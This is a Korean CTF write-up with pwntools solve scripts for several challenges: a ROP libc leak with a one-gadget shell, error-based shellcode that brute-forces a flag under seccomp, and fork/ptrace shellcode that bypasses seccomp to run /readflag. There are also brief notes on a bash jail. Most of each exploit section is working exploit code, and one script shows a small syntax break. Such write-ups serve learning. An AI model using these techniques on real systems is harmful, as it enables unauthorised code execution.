Christmas CTF
1. Solo_test
간단한 ROP이다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | from pwn import * r=remote('115.68.235.72',1337) e=ELF('./solo_test') libc=e.libc sla=r.sendlineafter sa=r.sendafter pr=0x0000000000400b83 answer=['Me','No','CTF','Never','No'] for i in range(len(answer)): sla('>>',answer[i]) payload='A'*0x58 payload+=p64(pr) payload+=p64(e.got['puts']) payload+=p64(e.plt['puts']) payload+=p64(e.symbols['solo']) sla('-->',payload) leak=u64(r.recvuntil('\x7f').replace('\x20','').ljust(8,'\x00'))-0x83cc0 log.info(hex(leak)) payload='A'*0x58 payload+=p64(leak+0x106ef8) sla('-->',payload) r.interactive() | cs |
2. babyseccomp
mmap이 안걸려 있다.
mmap으로 맵핑하고 Error based shellcoding 하면 될거 같아
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | from pwn import * import string context.arch = 'amd64' #context.log_level="error" flag = 'XMAS{' for i in range(5, 100): for j in string.printable: shellcode = shellcraft.mmap(0, 0x1000, 1, 1, 3, 0) #p = remote("115.68.235.72", 23457) p = process('./babyseccomp') shellcode += '''\ go: mov bl, [rax + {}] what: mov rcx, {} cmp rbx,rcx mov rax,0xdeadbeef jnz go jmp what '''.format(i, ord(j)) p.sendafter(': ', asm(shellcode)) try: p.recvuntil("Seg", timeout=2) flag += j print flag p.close() break except: p.close() continue | cs |
참고 : http://ipwn.kr/index.php/2019/07/01/isitdtu-ctf-2019-write-up/
3. Welcome_rev
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | dword=[0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F ,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E ,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91 ,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D ,0x6DE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0 ,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63 ,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172 ,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA ,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75 ,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180 ,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F ,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87 ,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106 ,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5 ,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818 ,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4 ,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B ,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA ,0x0FCB9887C,0x621F,0x15DA2D49,0x8CD37CF3,0x0FBD44C65 ,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541 ,0x3895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC ,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F ,0x00D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086 ,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E ,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81 ,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C ,0x74B1D29A,0x0EAD54739,0x9277AF,0x4DB2615,0x73DC1683 ,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B ,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2 ,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671 ,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x674ACC ,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8 ,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767 ,0x3FB506,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6 ,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79 ,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795 ,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28 ,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B ,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A ,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82 ,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D ,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68B3F8 ,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777 ,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF ,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D702EE ,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D ,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0 ,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C ,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0C70693 ,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02 ,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D] enc=[0x376740b3,0x94789c6e,0x66485793,0x56e8bf0e,0xd5f139c0] flag='XMAS{' flag_fake='' import string for i in string.printable: if(dword[0xff^ord(i)] == 0xead54739): print('0 : '+i) if(dword[0xc6^ord(i)] == 0xcb61b38c): print('1 : '+i) if(dword[0x34^ord(i)] == 0x1ca7eafb): print('2 : '+i) if(dword[0xfb^ord(i)] == 0x94643b84): print('3 : '+i) print('---') for i in string.printable: if(dword[0xff^ord(i)] == 0x4db2615): print('0 : '+i) if(dword[0xea^ord(i)] == 0x6906c2fe): print('1 : '+i) if(dword[0x27^ord(i)] == 0x5edef90e): print('2 : '+i) if(dword[0xe8^ord(i)] == 0x9309ff9d): print('3 : '+i) print('---') for i in string.printable: if(dword[0xff^ord(i)] == 0x17b7be43): print('0 : '+i) if(dword[0xbc^ord(i)] == 0xbdbdf21): print('1 : '+i) if(dword[0x60^ord(i)] == 0x646ba8c0): print('2 : '+i) if(dword[0x57^ord(i)] == 0xedb8832): print('3 : '+i) print('---') for i in string.printable: if(dword[0xff^ord(i)] == 0xf9b9df6f): print('0 : '+i) if(dword[0x90^ord(i)] == 0x4e048354): print('1 : '+i) if(dword[0x74^ord(i)] == 0x83d385c7): print('2 : '+i) if(dword[0x02 ^ ord(i)] == 0xc0ba6cad): print('3 : '+i) | cs |
시간안에 못푼거
adult seccomp
https://pwn3r.tistory.com/entry/SECCON-2018-QUAL-Simple-memo?category=801826
여기 있는거 복붙한다. 하지만 조금 바꿔야 한다.
대충 사진에 있는 것처럼 clone을 이용하려 하였지만 seccomp이 걸려 있어서 fork를 사용하였다.
fork 설명 : https://thdev.net/176
그리고 readflag라는 실행파일을 실행시키는 것으로 바꾸었다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 | from pwn import * context.arch='amd64' r=process('./problem') shellcode=''' push rbp mov rbp,rsp mov rax,57 syscall test rax,rax jz child mov rdx,0x30000000 delay: dec rdx test rdx,rdx jnz delay push rax /* waitpid(childpid, NULL, 0) */ mov rdi,rax mov rsi,0 mov rdx,0 mov r10,0 mov rax,0x3d syscall /* ptrace(PTRACE_SYSCALL, childpid, NULL, NULL) */ mov rdi,0x18 mov rsi,[rsp] mov rdx,0 mov r10,0 mov rax,0x54 syscall /* waitpid(childpid, NULL, 0) */ mov rdi,[rsp] mov rsi,0 mov rdx,0 mov r10,0 mov rax,0x3d syscall /* ptrace(PTRACE_GETREGS, childpid, NULL, ®s */ mov rdi,0xc mov rsi, [rsp] mov rdx,0 mov r10,rsp add r10,0x400 mov rcx,r10 mov rax,0x65 syscall /* ptrace(PTRACE_SETREGS, childpid, NULL, ®s) */ mov rdi, 0xd mov rsi, [rsp] mov rdx, 0 mov r10, rsp add r10, 0x400 mov r9, r10 add r9, 0x78 mov qword ptr [r9], 0x0000000000000002 mov rax, 0x65 syscall /* ptrace(PTRACE_DETACH, childpid, NULL, NULL) */ mov rdi, 0x11 mov rsi, [rsp] mov rdx, 0 mov r10, 0 mov rax, 101 syscall mov rax, 0x3c syscall child: /* ptrace(PTRACE_TRACEME, 0, NULL, NULL) */ mov rdi, 0 mov rsi, 0 mov rdx, 0 mov r10, 0 mov rax, 101 syscall /* syscall(SYS_gettid) */ mov rax, 0x27/*0xba*/ syscall /* syscall(SYS_tkill, pid, SIGSTOP) */ mov rdi, rax mov rsi, 0x13 mov rax, 0x3e/*0xc8*/ syscall ''' + shellcraft.pushstr('/readflag') + ''' mov rdi,rsp xor edx,edx xor esi,esi xor rax,rax push rdi push rdi mov rsi,rdi mov rax,39 syscall' '' r.sendline(asm(shellcode)) r.interactive() | cs |
auto injection
바이러니 안에 변수와 ret의 거리를 나타낸 데이터가 있다 그걸 이용하여 ret을 적절하게 덮는다
bash jail: $0, head,tail
deadfile이랑 meet은 롸업보고 공부해야겠다.